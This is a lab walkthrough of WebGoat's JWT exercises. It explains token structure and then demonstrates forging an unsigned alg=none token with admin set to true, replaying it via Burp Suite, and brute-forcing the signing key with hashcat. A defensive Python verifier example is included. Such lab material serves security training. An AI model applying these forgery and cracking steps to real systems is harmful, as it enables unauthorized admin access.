JWT unauthorized access vulnerability

Article directory

    • JWT unauthorized access vulnerability
      • Original reference: [xiu](http://www.xiusafe.com/2023/02/08/JWT/)
      • 1 Lab setup
      • 2 Composition of a JWT
        • 2.1 Header
          • 2.1.1 alg:
          • 2.1.2 typ:
        • 2.2 Payload
        • 2.3 Signature
      • 3 Vulnerability reproduction
        • 3.1 Attack point: the token (level 3)
        • 3.2 Decode the token: the parts are only Base64 encoded, so they can simply be read
        • 3.3 Modify the decoded JSON and Base64 encode it again
          • 3.3.1 Base64 encoding/decoding sites
          • 3.3.2 Take the modified Base64 and paste it into the decoder to check it
          • 3.3.3 Finally assemble the token. The trailing dot must be kept, because the backend splits on dots to obtain the parts
        • 3.4 Use Burp Suite to capture the request, replace the token value with the newly encoded Base64, and send it
      • 4 Level 4
      • 5 Level 5
      • 6 Level 7

Original reference: xiu

1 Lab setup

This lab uses webgoat-server-8.1.0.jar

Start the lab with: java -jar webgoat-server-8.1.0.jar --server.port=8888

Visit the page: http://127.0.0.1:8888/WebGoat/ -> Select registration

Fill in the username and password and click Register

Select JWT

Level 3 contains the process instructions

Choose the fourth level, which is the voting exercise

Switch to another user, vote, and try to reset the votes. The response says that only the admin user may do this. Use Burp Suite to intercept the request that was sent.

Burp Suite captures the request, and the response again says that only admin can reset the votes

The user's identity is carried in the token, so the token's contents are decoded and the token is modified.

Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE2OTU0NzA1MzgsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.19GkQq28-pNBY-8wYA3LnrEOZ5gF1h2HggUH73nTh994 L2ZK8sJmkx1tphdGWpgjHTQoXBDcCCZdAoVWwl1GCw;

2 Composition of a JWT

A JWT (JSON Web Token) consists of three parts: Header, Payload, and Signature.
 Header: the header usually consists of two fields, the algorithm type and the token type.
 Algorithm type: specifies the algorithm used to generate the signature, such as HMAC, RSA, or ECDSA.
 Token type: specifies the type of token; the common value is JWT.
The header is Base64Url-encoded and forms the first part of the JWT. An example header:
{
 "alg": "HS256",
 "typ": "JWT"
}
 Payload: the payload carries claims and other relevant information about the user or entity.
 Claims: information such as user ID, role, permissions, etc.
 Registered claims: standard claims (such as issuer, expiration time, etc.) plus any custom claims.
The payload is also Base64Url-encoded and forms the second part of the JWT. An example payload:
{
 "sub": "1234567890",
 "name": "John Doe",
 "iat": 1516239022
}
 Signature: the signature is the result of signing the header and payload and is used to verify the integrity and authenticity of the JWT.
 Signature generation: Base64Url-encode the header and payload, join them with a dot, sign the result with the algorithm specified in the header (such as HMAC or RSA), and append the resulting signature as the third part of the JWT.
2.1 Header
2.1.1 alg:

Describes the algorithm used to sign this JWT. Common values are HS256 (the default), HS512, etc.; it can also be none. HS256 stands for HMAC SHA256.

2.1.2 typ:

Indicates that the type of this token is JWT

2.2 Payload
The payload is where the actual information is stored. The name is borrowed from the cargo carried by an aircraft. This information consists of three kinds of claims:
* Registered claims
* Public claims
* Private claims

Registered claims (recommended but not mandatory):
* iss: the issuer of the JWT
* sub: the subject the JWT is about
* aud: the audience that receives the JWT
* exp: the expiration time of the JWT, which must be later than the issuance time
* nbf: the time before which the JWT must not be accepted
* iat: the time the JWT was issued
* jti: the unique identifier of the JWT, mainly used to make the token single-use and avoid replay attacks
2.3 Signature
The server holds a secret that is never sent to the client. It applies the algorithm specified in the header to the encoded header and payload together with this secret; the resulting string is the signature of the JWT.

3 Vulnerability reproduction

3.1 Attack point: the token (level 3)
The alg value HS256 in the header is changed to none

Before the change:
{
 "alg": "HS256",
 "typ": "JWT"
}

After the change:
{
 "alg": "none",
 "typ": "JWT"
}

3.2 Decode the token: the parts are only Base64 encoded, so they can simply be read
https://jwt.io/

The colors mark the header, payload and signature, so each part can be matched to its decoded content

3.3 Modify the decoded JSON and Base64 encode it again
3.3.1 Base64 encoding/decoding sites
https://www.bejson.com/enc/base64/ # Base64 encoding site

https://jwt.io/ # view the Base64 decoding

ewogICJpYXQiOiAxNjk1NDcwNTM4LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJhZG1pbiIKfQ

3.3.2 Take the modified Base64 and paste it into the decoder to check it
https://jwt.io/ # view with the Base64 decoder

3.3.3 Finally assemble the token. The trailing dot must be kept, because the backend splits on dots to obtain the parts
ewogICJhbGciOiAibm9uZSIKfQ.ewogICJpYXQiOiAxNjk1NDcwNTM4LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJhZG1pbiIKfQ.
3.4 Use Burp Suite to capture the request, replace the token value with the newly encoded Base64, and send it

Prompt: Congratulations, you have successfully completed the task
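As an added example (not code from the original article or from WebGoat), the following Python shows how the three Base64Url parts are joined and signed as section 2.3 describes, and how a verifier that pins the expected algorithm server-side rejects the alg=none token assembled in 3.3.3. The secret, function names and claim values are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# HMAC digests keyed by the header alg value; "none" is deliberately absent
HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(raw: bytes) -> str:
    # JWT uses unpadded Base64Url, which is why a token contains no "="
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(part: str) -> bytes:
    # Restore the padding that JWT strips before decoding
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def sign_jwt(payload: dict, secret: bytes, alg: str = "HS256") -> str:
    """Build header.payload.signature exactly as section 2.3 describes (assumed secret)."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode("ascii"), HMAC_ALGS[alg]).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_jwt(token: str, secret: bytes, expected_alg: str = "HS256",
               now: Optional[int] = None) -> Optional[dict]:
    # The header's alg is attacker-controlled, so the server pins the algorithm
    # instead of trusting the header; that is what defeats the alg=none token.
    parts = token.split(".")          # the backend splits on dots, as in 3.3.3
    if len(parts) != 3:
        return None
    head_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(head_b64))
        payload = json.loads(b64url_decode(body_b64))
    except ValueError:
        return None
    if not isinstance(header, dict) or header.get("alg") != expected_alg:
        return None                   # rejects "none" and any algorithm downgrade
    signing_input = (head_b64 + "." + body_b64).encode("ascii")
    expected = hmac.new(secret, signing_input, HMAC_ALGS[expected_alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None                   # empty or forged signature
    now = int(time.time()) if now is None else now
    if isinstance(payload, dict) and "exp" in payload and now >= int(payload["exp"]):
        return None                   # expired even though correctly signed (see level 5)
    return payload
```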

4 Level 4

Modify the payload data: change admin to true, and change the alg to none.

5 Level 5

Password brute force

Modify the exp validity time
Brute-force the key
hashcat -m 16500 jwt.txt -a 3 -w 3 1.txt
-m 16500: hash mode 16500 is the JWT token mode;
-a 3: brute-force attack
-w 3: can be understood as high-speed cracking, the kind of speed that makes the desktop unresponsive.
jwt.txt is the file where I saved the token that the exercise requires us to crack.
pass.txt: password dictionary

6 Level 7